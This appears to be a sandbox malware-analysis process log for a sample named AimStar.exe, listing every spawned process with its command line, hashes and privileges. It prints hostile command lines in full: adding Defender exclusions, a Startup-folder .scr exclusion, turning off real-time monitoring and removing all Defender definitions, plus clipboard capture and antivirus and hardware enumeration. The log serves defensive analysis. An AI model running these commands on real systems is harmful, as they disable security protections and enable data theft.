                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                        Start time:16:12:01
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                        Start time:16:12:01
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                        Start time:16:12:01
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                        Start time:16:12:01
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                        Start time:16:12:01
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                        Start time:16:12:01
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                        Start time:16:12:01
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                        Start time:16:12:01
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:16:12:01
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                        Start time:16:12:01
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                        Imagebase:0x7ff63d290000
                                                                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                        Start time:16:12:01
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                        Imagebase:0x7ff6ab520000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                        Start time:16:12:03
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                        Start time:16:12:04
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                        Start time:16:12:04
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                                                                                        Imagebase:0x7ff7be200000
                                                                                                                                                                                                                                        File size:77'312 bytes
                                                                                                                                                                                                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                        Start time:16:12:04
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                        Start time:16:12:04
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                        Start time:16:12:04
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                                                                                        Imagebase:0x7ff7be200000
                                                                                                                                                                                                                                        File size:77'312 bytes
                                                                                                                                                                                                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                        Start time:16:12:05
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                        Start time:16:12:05
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                        Start time:16:12:05
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                        Imagebase:0x7ff6ab520000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                        Start time:16:12:06
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                        Start time:16:12:06
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                        Start time:16:12:06
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                        Imagebase:0x7ff6ab520000
                                                                                                                                                                                                                                        File size:576'000 bytes
                                                                                                                                                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                        Start time:16:12:07
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                        Start time:16:12:07
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                        Start time:16:12:07
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                        Start time:16:12:08
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                        Start time:16:12:08
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                        Start time:16:12:08
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                        Start time:16:12:08
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                        Start time:16:12:08
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                        Imagebase:0x7ff63d290000
                                                                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                        Start time:16:12:08
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                        Imagebase:0x7ff63d290000
                                                                                                                                                                                                                                        File size:106'496 bytes
                                                                                                                                                                                                                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                        Start time:16:12:09
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                        Start time:16:12:09
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                        Start time:16:12:09
                                                                                                                                                                                                                                        Start date:01/01/2025
                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                        Imagebase:0x7ff6fc730000
                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
